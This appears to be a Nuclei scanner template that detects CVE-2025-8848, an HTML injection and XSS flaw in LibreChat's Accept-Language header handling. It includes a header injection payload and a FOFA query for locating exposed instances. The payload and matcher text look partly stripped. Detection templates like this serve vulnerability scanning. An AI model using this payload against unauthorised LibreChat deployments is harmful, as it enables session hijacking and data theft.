id: CVE-2025-8848 info: name: LibreChat <= 0.7.9 - HTML Injection via Accept-Language Header author: Kazgangap severity: medium description: | danny-avila/librechat 0.7.9 contains a stored XSS caused by improper sanitization of the Accept-Language header, letting logged-in users inject arbitrary HTML into the html lang= tag, exploit requires user to be logged in. impact: | Logged-in attackers can inject arbitrary HTML leading to cross-site scripting attacks, potentially compromising user sessions or data. remediation: | Update to the latest version where this issue is fixed. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-8848 - https://huntr.com/bounties/a05ebc1f-882a-4adc-b178-d3cefa4b730e - https://github.com/danny-avila/LibreChat classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2025-8848 epss-score: 0.00417 epss-percentile: 0.3419 cwe-id: CWE-79 metadata: verified: true max-request: 1 fofa-query: app="LibreChat" tags: cve,cve2025,librechat,html-injection variables: marker: "{{rand_base(20)}}" http: - method: GET path: - "{{BaseURL}}/" headers: Accept-Language: "

{{marker}}

" matchers-condition: and matchers: - type: word words: - '' - 'LibreChat' condition: and - type: status status: - 200 # digest: 4b0a0048304602210096ac1f79af99700def9228369eab32d954c5d1b6ec6a62c37f45edba96d115c9022100c4ed4041058715c0061e246da295c3b445c69e82682671a6c26ee9700fc1dfc3:922c64590222798bb761d5b6d8e72950